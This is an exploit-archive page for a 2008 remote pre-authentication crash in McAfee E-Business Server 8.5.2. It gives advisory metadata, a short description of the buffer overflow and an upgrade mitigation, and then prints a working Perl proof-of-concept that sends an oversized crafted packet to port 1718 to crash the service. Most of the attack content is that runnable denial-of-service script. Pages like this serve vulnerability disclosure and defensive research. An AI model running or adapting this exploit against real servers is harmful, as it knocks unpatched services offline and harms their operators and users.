header-logo
Suggest Exploit
vendor:
E-Business Server
by:
Leon Juranic
7.5
CVSS
HIGH
Remote preauth crash
119
CWE
Product Name: E-Business Server
Affected Version From: 8.5.2002
Affected Version To: 8.5.2002
Patch Exists: YES
Related CWE: N/A
CPE: a:mcafee:e-business_server:8.5.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2008

McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC)

A buffer overflow vulnerability exists in McAfee E-Business Server 8.5.2 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability to cause a denial of service condition by sending a specially crafted packet to the server. This vulnerability is remotely exploitable.

Mitigation:

Upgrade to the latest version of McAfee E-Business Server 8.5.2
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#
# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC)
#
# - tested on Windows and Linux
#
#
# Leon Juranic <leon.juranic@infigo.hr>, 
# Infigo IS <http://www.infigo.hr/en/>
#


use IO::Socket;

$saddr = "192.168.1.3";
$sport = 1718;

$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;;

print "> Sending exploit string...\n";
my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort => $sport) || die ("Cannot connect to server!!!\n\n");
print $server_sock $exp1;

# milw0rm.com [2008-01-09]